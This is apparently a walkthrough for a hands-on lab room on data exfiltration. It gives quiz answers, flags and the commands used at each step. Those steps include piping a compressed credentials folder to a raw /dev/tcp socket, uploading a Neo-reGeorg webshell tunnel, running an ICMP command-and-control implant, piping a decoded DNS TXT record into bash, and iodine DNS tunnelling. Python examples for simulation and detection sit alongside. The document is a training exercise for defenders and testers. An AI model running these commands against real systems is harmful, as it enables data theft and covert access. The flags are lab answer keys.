
Data Exfiltration

This guide contains the answers to the Data Exfiltration room and the steps needed to reach them.


Data Exfiltration

  1. In which case scenario will sending and receiving traffic continue during the connection?

This answer can be found in the text.

Answer: Tunneling

  1. In which case scenario will sending and receiving traffic be in one direction?

This answer can be found in the text.

Answer: Traditional data exfiltration

  1. In the next task, we will be discussing how data exfiltration over the TCP socket works!

Exfiltration using TCP socket

  1. Exfiltration using TCP sockets relies on ______ protocols!

The answer can be found in the text.

Answer: Non-standard

  1. Now apply what we discussed to exfiltrate data over the TCP socket! Once you exfiltrate data successfully, hit Completed to move on to the next task!

We need to SSH into the jump server and set up a listener that writes whatever arrives on port 1337 to a file:

ssh thm@10.10.66.20
nc -nlvp 1337 > /tmp/task4-creds.data

Next, in a second terminal, we SSH into the victim1 machine through the jump server (the first session stays busy running the listener):

ssh thm@10.10.66.20
ssh thm@victim1.thm.com

(Screenshot: TCP listener)

On victim1 we compress the 'task4' folder, base64-encode the archive, translate the text to EBCDIC and write it straight into a TCP socket to the jump server (192.168.0.133 is the jump server's address on the internal network):

tar zcf - task4/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/1337

/dev/tcp/<host>/<port> is not a real device file but a bash feature, so this must run under bash rather than sh; the upside is that nothing has to be installed on the victim. The EBCDIC step is light obfuscation only: it makes the bytes on the wire non-printable, so a content filter looking for base64 text will not match, but anyone who captures the traffic can undo it with the same dd command.

(Screenshot: TCP exfiltrate)

Now that the data has arrived on the jump server, we reverse the two steps, decoding and decompressing the archive to get to the files:

dd conv=ascii if=/tmp/task4-creds.data | base64 -d > task4-creds.tar
tar xvf task4-creds.tar

(Screenshot: TCP files)
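To see exactly what those two pipelines do to the bytes, here is an added Python example (not part of the room or of this walkthrough) that reproduces the sender's tar | base64 | dd conv=ebcdic stages and the receiver's dd conv=ascii | base64 -d | tar x stages in memory, without a network. It assumes that dd's EBCDIC table agrees with IBM code page 037 for the characters base64 output contains (the base64 alphabet, '=' and newline), so Python's cp037 codec stands in for dd; the sample files are constructed.

```python
import base64
import io
import tarfile

# dd's conv=ebcdic uses the POSIX ASCII->EBCDIC table. For the characters that
# base64 output contains (A-Z, a-z, 0-9, '+', '/', '=' and newline) that table
# agrees with IBM code page 037, so the cp037 codec stands in for dd here
# (assumption, see lead-in).
EBCDIC = "cp037"
B64_ALPHABET = set(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\n")


def pack_files(files):
    """In-memory equivalent of `tar zcf - task4/`; files is {name: bytes}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in sorted(files.items()):
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def to_wire(archive):
    """`base64 | dd conv=ebcdic`: base64 text (76-column lines, as GNU base64
    emits), then a byte-for-byte ASCII->EBCDIC translation."""
    b64_text = base64.encodebytes(archive).decode("ascii")
    return b64_text.encode(EBCDIC)


def from_wire(blob):
    """`dd conv=ascii | base64 -d`: undo the translation, then the base64."""
    return base64.b64decode(blob.decode(EBCDIC))


def unpack_files(archive):
    """In-memory equivalent of `tar xvf`; returns {name: bytes}."""
    out = {}
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile():
                out[member.name] = tar.extractfile(member).read()
    return out


def looks_like_base64(blob):
    """What a naive content filter checks: is every byte printable base64?"""
    return all(b in B64_ALPHABET for b in blob)


def round_trip(files):
    """Send and receive in memory; returns (bytes on the wire, recovered files)."""
    wire = to_wire(pack_files(files))
    return wire, unpack_files(from_wire(wire))


if __name__ == "__main__":
    # Constructed sample content, not the room's real task4 files.
    sample = {"task4/creds.txt": b"thm:Passw0rd!\n", "task4/notes.txt": b"exfil me\n"}
    wire, recovered = round_trip(sample)
    print("files recovered intact:", recovered == sample)
    print("wire bytes pass a base64 text check:", looks_like_base64(wire))
```

Running it shows the files come back intact and that the bytes on the wire no longer pass a printable-base64 check, which is all the EBCDIC step buys: it defeats a naive string match, not an analyst with a capture.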

Exfiltration using SSH

  1. All packets sent using the Data Exfiltration technique over SSH are encrypted! (T=True/F=False)

The answer can be found in the text.

Answer: T

  1. Replicate the steps to transfer data over the SSH client. Once you transfer the file successfully, hit Completed and move on to the next task!

On victim1 we archive the 'task5' folder and pipe it straight into the SSH client, which unpacks it in /tmp on the jump server. Everything crosses the network inside the SSH session, so the contents are encrypted in transit and no listener is needed on the receiving side:

tar cf - task5/ | ssh thm@jump.thm.com "cd /tmp/; tar xpf -"

(Screenshot: SSH exfiltrate)

(Screenshot: SSH files)

Exfiltrate using HTTP(S)

  1. Check the Apache log file on web.thm.com and get the flag!

After SSHing into the web server through the jump server, we can read the Apache access log:

sudo cat /var/log/apache2/access.log

(Screenshot: HTTP flag 1)

One of the logged requests carries the flag as a base64 string in the request line. Decoding it gives the flag:

echo VEhNe0g3N1AtRzM3LTE1LWYwdW42fQo= | base64 -d

(Screenshot: HTTP flag 1 decoded)

Answer: THM{H77P-G37-15-f0un6}
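As a defender's counterpart to reading the log by eye, here is an added Python example (my own, not code from the room) that scans Apache access-log lines for base64 payloads in the request target and decodes them. The log lines it runs on are constructed for the example; the only value taken from the page is the base64 string above.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Apache "combined" access log line. Only the request target (path + query)
# is inspected for payloads.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# A run of base64 characters long enough to be unlikely in a normal path.
B64_TOKEN = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')

# Constructed sample lines, not the room's real access.log. The second line
# carries the base64 string from the task; the third is a benign request whose
# long path word must not be reported.
SAMPLE_LOG = """\
192.168.0.133 - - [10/Feb/2024:10:01:12 +0000] "GET / HTTP/1.1" 200 612 "-" "curl/7.81.0"
192.168.0.133 - - [10/Feb/2024:10:01:20 +0000] "GET /index.php?q=VEhNe0g3N1AtRzM3LTE1LWYwdW42fQo%3D HTTP/1.1" 200 12 "-" "curl/7.81.0"
10.10.3.7 - - [10/Feb/2024:10:02:05 +0000] "GET /assets/applicationstylesheet.css HTTP/1.1" 200 4051 "-" "Mozilla/5.0"
"""


def decode_token(token):
    """Return the decoded text if `token` is well-formed base64 that decodes
    to printable text, otherwise None (this filters ordinary long path words,
    which fail the padding/alphabet check or decode to garbage)."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if text.strip().isprintable() else None


def find_exfil(lines):
    """Scan access-log lines; return (client, target, decoded_text) for each
    request whose path or query string carries a decodable base64 payload."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = unquote(m["target"])  # %3D -> '=' and similar URL escapes
        for token in B64_TOKEN.findall(target):
            text = decode_token(token)
            if text is not None:
                hits.append((m["client"], target, text.strip()))
    return hits


if __name__ == "__main__":
    for client, target, text in find_exfil(SAMPLE_LOG.splitlines()):
        print(f"{client} {target} -> {text!r}")
```

The same scan is worth running over query strings and POST bodies in a real investigation; the padding and printability checks keep the false positives from long path segments down.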

  1. When you visit the http://flag.thm.com/flag website through the uploader machine via the HTTP tunneling technique, what is the flag?

The first step in building the HTTP tunnel with Neo-reGeorg is to generate the tunnel scripts, protected by a key of our choice:

python3 neoreg.py generate -k thm

(Screenshot: Neo-reGeorg key generation)

Now we upload the generated tunnel.php to the web server through the form at http://10.10.230.138/uploader (the upload form asks for the key 'admin').

(Screenshot: uploading the tunnel script)

Next we start the tunnel client on our machine, giving it the same key and the URL of the uploaded script:

python3 neoreg.py -k thm -u http://10.10.230.138/uploader/files/tunnel.php

(Screenshot: Neo-reGeorg tunnel running)

Neo-reGeorg now listens as a SOCKS5 proxy on 127.0.0.1:1080; every connection sent through it is wrapped in HTTP requests to tunnel.php and comes out of the web server on the internal network. We can use curl through the proxy to reach the flag server:

curl --socks5 127.0.0.1:1080 http://172.20.0.120:80

(Screenshot: HTTP get flag)

This is not the flag, but the page points us to the correct path:

curl --socks5 127.0.0.1:1080 http://172.20.0.120:80/flag

(Screenshot: HTTP flag 2)

Answer: THM{H77p_7unn3l1n9_l1k3_l337}

Exfiltration using ICMP

  1. In which ICMP packet section can we include our data?

This answer can be found in the text.

Answer: data

  1. Follow the technique discussed in this task to establish a C2 ICMP connection between JumpBox and ICMP-Host. Then execute the "getFlag" command. What is the flag?

On ICMP-Host we start the icmpdoor binary (the implant) pointed at the jump box, and on the jump box we start icmp-cnc (the controller) pointed at ICMP-Host. Both run with sudo because they send raw ICMP packets, and each host uses its own interface name:

sudo icmpdoor -i eth0 -d 192.168.0.133
sudo icmp-cnc -i eth1 -d 192.168.0.121

Once the two are talking, every command typed into icmp-cnc travels to ICMP-Host in the data section of an ICMP packet, and the output comes back the same way. Running getFlag returns the flag:

(Screenshot: ICMP get flag)

Answer: THM{g0t-1cmp-p4k3t!}
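To show what "our data goes in the data section" means on the wire, here is an added Python example (not code from the room or from icmpdoor) that builds an ICMP echo packet whose data field carries a command, validates and parses it back, and plays the request/reply round trip in memory. Packet layout follows RFC 792 (8-byte header) with the RFC 1071 checksum; the identifier 0x1337, the sequence number and the command/output bytes are arbitrary sample values, and the crude payload heuristic at the end is my own, not something the page describes.

```python
import struct

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0
# ICMP echo header: type, code, checksum, identifier, sequence (RFC 792)
HEADER = struct.Struct("!BBHHH")


def icmp_checksum(data):
    """RFC 1071 one's-complement checksum over the ICMP header and data."""
    if len(data) % 2:
        data += b"\x00"  # pad to 16-bit words for the sum only
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    total = (total >> 16) + (total & 0xFFFF)
    total += total >> 16
    return (~total) & 0xFFFF


def build_echo(payload, ident=0x1337, seq=1, reply=False):
    """Build an ICMP echo packet (without the IP header) whose data section
    carries `payload`; this is where an ICMP C2 puts its command or output."""
    kind = ICMP_ECHO_REPLY if reply else ICMP_ECHO_REQUEST
    header = HEADER.pack(kind, 0, 0, ident, seq)   # checksum field zero first
    csum = icmp_checksum(header + payload)
    return HEADER.pack(kind, 0, csum, ident, seq) + payload


def parse_echo(packet):
    """Validate the checksum and split an echo packet into its fields.
    Returns (type, identifier, sequence, data) or raises ValueError."""
    if len(packet) < HEADER.size:
        raise ValueError("short ICMP packet")
    # summing a packet that includes a correct checksum yields 0
    if icmp_checksum(packet) != 0:
        raise ValueError("bad ICMP checksum")
    kind, code, _, ident, seq = HEADER.unpack_from(packet)
    if kind not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY) or code != 0:
        raise ValueError("not an echo packet")
    return kind, ident, seq, packet[HEADER.size:]


def exchange(command, output):
    """The C2 round trip in memory: the controller sends `command` in an echo
    request, the implant answers with `output` in an echo reply that keeps the
    same identifier and sequence. Returns what each side recovered."""
    request = build_echo(command)
    _, ident, seq, cmd = parse_echo(request)
    reply = build_echo(output, ident=ident, seq=seq, reply=True)
    _, _, _, out = parse_echo(reply)
    return cmd, out


def looks_like_command(data):
    """Crude detection heuristic (my own): a normal ping payload is a
    timestamp followed by an incrementing byte pattern, not printable text."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    return len(text) > 0 and text.isprintable()


if __name__ == "__main__":
    # Sample command and output bytes, constructed for the example.
    cmd, out = exchange(b"getFlag", b"THM{sample}")
    print("controller sent:", cmd, "implant answered:", out)
    print("command payload looks like text:", looks_like_command(cmd))
    print("default ping pattern looks like text:",
          looks_like_command(bytes(range(0x10, 0x38))))
```

Sending these packets for real needs a raw socket (hence the sudo in the commands above); the point here is the layout: everything after the 8-byte header is data the kernel does not interpret, which is why echo traffic is such a convenient carrier.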

DNS Configurations

  1. Once the DNS configuration works fine, resolve the flag.thm.com domain name. What is the IP address?

From a machine that already uses the lab's DNS server, such as the jump box, the query on its own gives us the IP of the flag server:

dig +short flag.thm.com

To run the same query from the AttackBox itself, we must first point its resolver at the lab DNS server. Edit the nameserver in the following file and set it to 10.10.230.138:

nano /etc/resolv.conf

After that the dig command works from the AttackBox as well.

(Screenshot: DNS IP)

Answer: 172.20.0.120

Exfiltration over DNS

  1. What is the maximum length for the subdomain name (label)?

The answer can be found in the text.

Answer: 63

  1. The fully qualified domain name (FQDN) must not exceed ______ characters.

The answer can be found in the text.

Answer: 255
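Those two limits decide how much data one DNS query can carry. The following added Python example (mine, not code from the room) takes a payload, encodes it and splits it into query names under a domain so that no label exceeds 63 characters and no name exceeds the length limit, then reassembles the payload from the captured names. It uses base32 rather than the base64 used for the TXT records later in this task, because names (unlike TXT record data) are case-insensitive; the domain tunnel.com and the sample payload are assumptions made for the example. Note that the 255-character figure from the task is the wire-format limit; in dotted text form a name can be at most 253 characters, which is what the code enforces.

```python
import base64

MAX_LABEL = 63   # longest DNS label (RFC 1035)
MAX_NAME = 253   # longest name in dotted text form; the 255-octet limit from
                 # the task is the wire format, which adds two bytes


def encode_queries(data, domain, seq_width=4):
    """Split `data` into query names of the form <seq>.<label>.<label>...<domain>.
    Each label stays within 63 characters and each full name within 253.
    Base32 (lowercase, padding dropped) is used because DNS names are
    case-insensitive, so case-sensitive base64 could be corrupted in transit.
    `seq_width` hex digits of sequence number limit a transfer to 16**seq_width
    queries, which is plenty here."""
    text = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    # characters left for data labels after "<seq>." and ".<domain>"
    budget = MAX_NAME - (seq_width + 1) - (1 + len(domain))
    names, seq, pos = [], 0, 0
    while pos < len(text):
        labels, used = [], 0
        while pos < len(text):
            sep = 1 if labels else 0                      # the dot before this label
            take = min(MAX_LABEL, len(text) - pos, budget - used - sep)
            if take <= 0:
                break
            labels.append(text[pos:pos + take])
            pos += take
            used += take + sep
        names.append(f"{seq:0{seq_width}x}." + ".".join(labels) + "." + domain)
        seq += 1
    return names


def decode_queries(names, domain):
    """Reassemble the payload from captured query names, in any order."""
    parts = {}
    for name in names:
        body = name[:-(len(domain) + 1)]              # strip ".<domain>"
        seq, _, payload = body.partition(".")
        parts[int(seq, 16)] = payload.replace(".", "")
    text = "".join(parts[i] for i in sorted(parts)).upper()
    text += "=" * (-len(text) % 8)                    # restore base32 padding
    return base64.b32decode(text)


def check_limits(names):
    """True if every name and every label respects the DNS length limits."""
    return all(len(n) <= MAX_NAME and
               all(len(label) <= MAX_LABEL for label in n.split("."))
               for n in names)


if __name__ == "__main__":
    # Constructed sample payload, not data from the room.
    sample = b"user=thm&pass=hunter2\n" * 20
    queries = encode_queries(sample, "tunnel.com")
    print(len(sample), "bytes ->", len(queries), "queries, limits ok:",
          check_limits(queries))
    print("first query:", queries[0])
    print("round trip ok:", decode_queries(queries, "tunnel.com") == sample)
```

With a 10-character domain each query carries about 234 base32 characters, roughly 146 bytes of payload, which is why a file of any size turns into a long burst of queries for odd-looking subdomains; that volume and the label entropy are what DNS exfiltration detection keys on.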

  1. Execute the C2 communication over the DNS protocol of the flag.tunnel.com. What is the flag?

We repeat what we did earlier in this task, this time for the flag.tunnel.com record. After adding our script, base64-encoded, as a TXT record named 'script' on the DNS server, we read it back with:

dig +short -t TXT script.tunnel.com

(Screenshot: DNS exfiltration TXT)

We named the TXT record 'script', hence the subdomain.

We can do the same for the flag.tunnel.com TXT record:

dig +short -t TXT flag.tunnel.com

(Screenshot: DNS exfiltration base64)

The record value comes back as a quoted string, so we strip the quotes and base64-decode it:

dig +short -t TXT flag.tunnel.com | tr -d "\"" | base64 -d

(Screenshot: DNS exfiltration contents)

This gives us a shell script that prints the flag. Piping the decoded record into bash executes it, which is the C2 pattern of this task: the implant looks up a TXT record and runs whatever comes back, so ordinary-looking DNS queries carry the commands:

dig +short -t TXT flag.tunnel.com | tr -d "\"" | base64 -d | bash

(Screenshot: DNS exfiltration flag)

Answer: THM{C-tw0-C0mmun1c4t10ns-0v3r-DN5}

DNS Tunneling

  1. When the iodine connection establishes to Attacker, run the ifconfig command. How many interfaces are there? (including the loopback interface)

First we add two records on the DNS server: an A record pointing at our AttackBox and an NS record that delegates t1.tunnel.com to it.

(Screenshot: DNS tunnel A record)

(Screenshot: DNS tunnel NS record)

Now that queries for anything under t1.tunnel.com are forwarded to our machine, we can start the iodine server on the AttackBox (-f keeps it in the foreground, -c skips the client IP check, -P sets the password, and 10.1.1.1/24 is the tunnel network the server hands out):

sudo /sbin/iodined -f -c -P thmpass 10.1.1.1/24 t1.tunnel.com

(Screenshot: DNS tunnel server)

Then we start the client on the jump machine with the same password and tunnel domain:

sudo iodine -f -P thmpass t1.tunnel.com

(Screenshot: DNS tunnel client)

We can now check how many interfaces are active on the jump machine with ifconfig:

(Screenshot: DNS tunnel interfaces)

Answer: 4

  1. What is the network interface name created by iodined?

One interface was added when the tunnel came up; it is the first one listed in the previous screenshot.

Answer: dns0

  1. Use the DNS tunneling to prove your access to the webserver, http://192.168.0.100/test.php. What is the flag?

With the tunnel in place the jump box is reachable from the AttackBox at its tunnel address, 10.1.1.2, so we open an SSH session to it over the DNS tunnel and turn that session into a SOCKS proxy:

ssh thm@10.1.1.2 -4 -N -f -D 1080

-D 1080 enables dynamic port forwarding, so the SSH session acts as a SOCKS proxy on 127.0.0.1:1080 whose connections exit from the jump box; -4 forces IPv4, -N runs no remote command, and -f sends the session to the background once it has authenticated.

(Screenshot: DNS tunnel SSH)

At first I thought something hadn't worked, but later found out that the ssh session had been backgrounded by the -f argument.

Now we can reach the web server through the proxy in two ways: with curl directly or with proxychains.

With curl, the --socks5 option points it at the proxy:

curl --socks5 127.0.0.1:1080 http://192.168.0.100/test.php

(Screenshot: DNS tunnel curl flag)

For proxychains we must first add the proxy to its config file:

nano /etc/proxychains4.conf

# Add at the end
socks5 127.0.0.1 1080

Now we can also use proxychains with:

proxychains curl http://192.168.0.100/test.php

(Screenshot: DNS tunnel proxychains flag)

Answer: THM{DN5-Tunn311n9-1s-c00l}